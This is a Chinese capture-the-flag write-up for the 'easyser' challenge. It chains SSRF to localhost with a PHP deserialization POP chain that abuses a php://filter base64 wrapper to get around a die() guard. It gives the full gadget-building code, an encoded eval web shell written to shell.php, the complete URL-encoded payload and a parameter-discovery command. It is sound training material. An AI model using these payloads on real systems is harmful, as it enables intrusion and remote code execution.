[羊城杯 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)

一、解题过程

（一）、一阶段

1. 可以直接使用ctf-wscan扫描一下有什么文件，或者直接试试robots.txt能不能行
   
   直接打开star1.php
   
   看到这页面，和页面提示，基本和SSRF有关系了
2. F12看提示： 小胖说用个不安全的协议从我家才能进ser.php呢！ !
   意思就是http协议就能进ser.php，回顾一下http协议咋用的？
   http://ser.php　×
   http://127.0.0.1/ser.php　√

   
   	error_reporting(0);
   	if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
   	    highlight_file(__FILE__);
   	} 
   	$flag='{Trump_:"fake_news!"}';
   	
   	class GWHT{
   	    public $hero;
   	    public function __construct(){
   	        $this->hero = new Yasuo;
   	    }
   	    public function __toString(){
   	        if (isset($this->hero)){
   	            return $this->hero->hasaki();
   	        }else{
   	            return "You don't look very happy";
   	        }
   	    }
   	}
   	class Yongen{ //flag.php
   	    public $file;
   	    public $text;
   	    public function __construct($file='',$text='') {
   	        $this -> file = $file;
   	        $this -> text = $text;
   	        
   	    }
   	    public function hasaki(){
   	        $d   = '';
   	        $a= $d. $this->text;
   	         @file_put_contents($this-> file,$a);
   	    }
   	}
   	class Yasuo{
   	    public function hasaki(){
   	        return "I'm the best happy windy man";
   	    }
   	}
   ?> your hat is too black!
   

3. 分析
   起点：GWHT（__construct）终点：Yongen（hasaki）
   链条：GWHT（construct -> toString）-> Yongen（construct -> hasaki）
   属性：GWHT（hero=$y）-> Yongen（file=伪协议代码;text=一句话;）
4. 根据ser.php构造pop链

    
   	class GWHT{
   	    public $hero;
   	}
   	class Yongen{
   	    public $file;
   	    public $text;
   	}
   	
   	$g = new GWHT();
   	$y = new Yongen();
   	$g->hero = $y;
   	$y->file = "php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
   	$y->text = "PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4=";
   	
   	echo urlencode(serialize($g));
   ?>
   
   绕死亡die原理：写入shell.php的内容会进行base64解码，而''; 经过解码会变成乱码而失效，这样就绕过了
   得到：O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A40%3A%22PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4%3D%22%3B%7D%7D
   

（二）、二阶段

在得到序列化数据之后，有个问题，怎么传参？参数名是啥？
这里需要用一个工具：arjun

arjun -u http://node4.anna.nssctf.cn:28330/star1.php?path=http%3A%2F%2F127.0.0.1%2Fser.php -d 1
得到参数是c

payload=?path=http%3A%2F%2F127.0.0.1%2Fstar1.php&c=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A40%3A%22PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4%3D%22%3B%7D%7D

蚁剑连接shell.php即可查看flag

二、思考总结

1、我使用arjun工具扫不出来这题的参数，不太清楚原因
2、这题的unserialize函数在star1.php，ser.php没显示，但是还是可以正常反序列化